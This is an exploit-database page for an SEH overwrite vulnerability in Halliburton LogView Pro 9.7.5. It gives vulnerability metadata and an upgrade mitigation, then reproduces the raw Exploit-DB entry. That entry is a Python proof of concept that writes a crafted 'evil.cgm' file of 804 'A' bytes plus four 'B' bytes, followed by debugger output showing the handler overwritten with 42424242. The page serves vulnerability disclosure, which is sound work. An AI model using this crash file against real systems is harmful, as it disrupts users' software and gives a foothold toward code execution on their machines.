header-logo
Suggest Exploit
vendor:
LogView Pro
by:
Karn Ganeshen
7,8
CVSS
HIGH
SEH Overwrite
119
CWE
Product Name: LogView Pro
Affected Version From: 9.7.5
Affected Version To: 9.7.5
Patch Exists: Yes
Related CWE: N/A
CPE: a:halliburton:logview_pro:9.7.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista Ultimate SP2
2020

Haliburton LogView Pro v9.7.5

Haliburton LogView Pro v9.7.5 is vulnerable to a SEH overwrite vulnerability. By opening a specially crafted cgm/tif/tiff/tifh file, the program will crash and the SEH handler can be overwritten. The SEH chain of the main thread contains a corrupt entry at address 0012D8CC.

Mitigation:

Upgrade to the latest version of Haliburton LogView Pro.
Source

Exploit-DB raw data:

# Exploit Title: [Haliburton LogView Pro v9.7.5]
# Exploit Author: [Karn Ganeshen]
# Download link: [http://www.halliburton.com/public/lp/contents/Interactive_Tools/web/Toolkits/lp/Halliburton_Log_Viewer.exe]

# Version: [Current version 9.7.5]
# Tested on: [Windows Vista Ultimate SP2]
#
# Open cgm/tif/tiff/tifh file -> program crash -> SEH overwritten
#
# SEH chain of main thread
# Address SE handler
# 0012D22C kernel32.76B6FEF9
# 0012D8CC 42424242
# 41414141 *** CORRUPT ENTRY ***
#

#!/usr/bin/python

file="evil.cgm"
buffer = "A"*804 + "B"*4

file = open(file, 'w')
file.write(buffer)
file.close()

# +++++

Navigation

Suggest Exploit

Services By CQR